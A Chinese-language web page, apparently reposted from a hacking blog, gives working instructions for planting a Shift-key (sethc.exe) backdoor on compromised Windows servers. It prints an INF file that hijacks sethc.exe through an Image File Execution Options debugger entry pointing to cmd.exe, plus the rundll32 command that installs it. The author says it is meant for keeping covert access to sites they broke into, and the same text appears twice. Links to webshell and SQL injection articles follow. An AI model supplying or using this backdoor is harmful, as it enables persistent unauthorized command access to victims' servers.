您现在的位置是:网站首页> 编程资料编程资料
添加SHIFT后门又一法 学习如何查找后门_入侵防御_网络安全_
2023-05-24
253人已围观
简介 添加SHIFT后门又一法 学习如何查找后门_入侵防御_网络安全_
前几天搞了几个网站,之前搞的站一般不留后门,其实基本留了都被删除了,这次下决心要搞个shift后门留着自己用的,秒杀给你介绍一个方法!
将下面的代码保存成inf文件
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe
然后上传到一个可以执行目录,比如我这里上传到c:\windows\temp\i.inf 然后在命令行执行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf
然后远程登录3389,按5下shift即可跳出cmd.exe
为什么要命令行?隐蔽性?大家自行掂量
转载:秒杀博客
将下面的代码保存成inf文件
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe
然后上传到一个可以执行目录,比如我这里上传到c:\windows\temp\i.inf 然后在命令行执行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf
然后远程登录3389,按5下shift即可跳出cmd.exe
为什么要命令行?隐蔽性?大家自行掂量
转载:秒杀博客
相关内容
- SC.exe在渗透中的妙用_入侵防御_网络安全_
- webshell下执行CMD的小技巧分享_入侵防御_网络安全_
- webshell下提权两个小技巧分享_入侵防御_网络安全_
- ACCESS数据库后台sql语句执行导shell的方法_入侵防御_网络安全_
- 网站拿webshell一技巧_入侵防御_网络安全_
- serv_u提权记录: 530 Not logged in, home directory does not exist_入侵防御_网络安全_
- 手工注入拿到管理员密码登陆后台 图文_入侵防御_网络安全_
- 通过MySQL系统得到cmdshell的方法与防范_入侵防御_网络安全_
- 手动mysql 高级注入实例分析_入侵防御_网络安全_
- SQL注入攻击的种类和防范手段_入侵防御_网络安全_
